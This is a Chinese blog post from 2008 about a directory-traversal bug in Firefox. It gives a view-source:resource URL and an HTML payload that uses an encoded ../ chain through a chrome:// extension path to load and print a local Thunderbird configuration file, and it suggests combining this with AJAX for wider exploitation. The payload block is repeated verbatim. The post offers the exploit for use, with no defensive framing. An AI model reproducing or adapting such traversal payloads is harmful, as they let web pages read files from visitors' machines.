订阅
上一篇
下一篇
火狐的跨目录漏洞
作者:admin 日期:2008-01-21
在火狐浏览器里输入网址:view-source:resource:///%2e%2e 看看.
更高级的用法:
<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script>
<script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script>
重写了pref函数,原来pref是all.js里的一个函数.all.js是雷鸟目录下的一个配置文件.其实如果和AJAX结合起来应该有更大的利用前景.
更高级的用法:
<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script>
<script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script>
重写了pref函数,原来pref是all.js里的一个函数.all.js是雷鸟目录下的一个配置文件.其实如果和AJAX结合起来应该有更大的利用前景.
[本日志由 admin 于 2008-01-21 11:37 AM 编辑]
文章来自: 本站原创
引用通告地址: http://www.zxboy.com/trackback.asp?tbID=175
Tags:
文章来自: 本站原创引用通告地址: http://www.zxboy.com/trackback.asp?tbID=175Tags: 评论: 1 | 引用: 0 | 查看次数: 1230
- 1
lodx [2008-04-12 07:26 PM]强!
- 1
发表评论
